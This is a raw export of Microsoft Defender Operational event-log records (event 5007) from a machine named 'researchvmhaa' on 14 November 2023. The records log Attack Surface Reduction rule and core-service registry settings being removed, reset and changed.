SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=588 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\MdTrustedSubjectOrgs = New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedSubjectOrgs = Microsoft Corporation|DigiCert Inc 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=587 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\WdConfigHash = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdConfigHash = 0x51AE05A1 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=586 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\MdTrustedRootCertThumbPrints = New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedRootCertThumbPrints = CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F|4348A0E9444C78CB265E058D5E8944B4D84F9662BD26DB257F8934A443C70161 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=585 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\WdTimerInitalDelay = 0x1388 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerInitalDelay = 0x493E2 11/14/2023 10:42:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=581 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/14/2023 10:42:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=580 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0 11/14/2023 10:42:30 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=579 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 11/14/2023 10:42:14 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=578 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=577 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=576 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=575 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=574 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=573 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=572 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=571 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=570 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=569 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=568 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=567 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=566 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=565 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=564 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=563 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=562 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=561 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=560 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=559 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=558 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=557 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=556 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=555 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=554 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=553 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=552 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=551 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=550 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=549 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=548 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=547 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0 11/14/2023 10:20:24 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=546 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 New value: 11/14/2023 10:20:24 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=545 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=544 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=543 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=542 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=541 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=540 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=539 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED 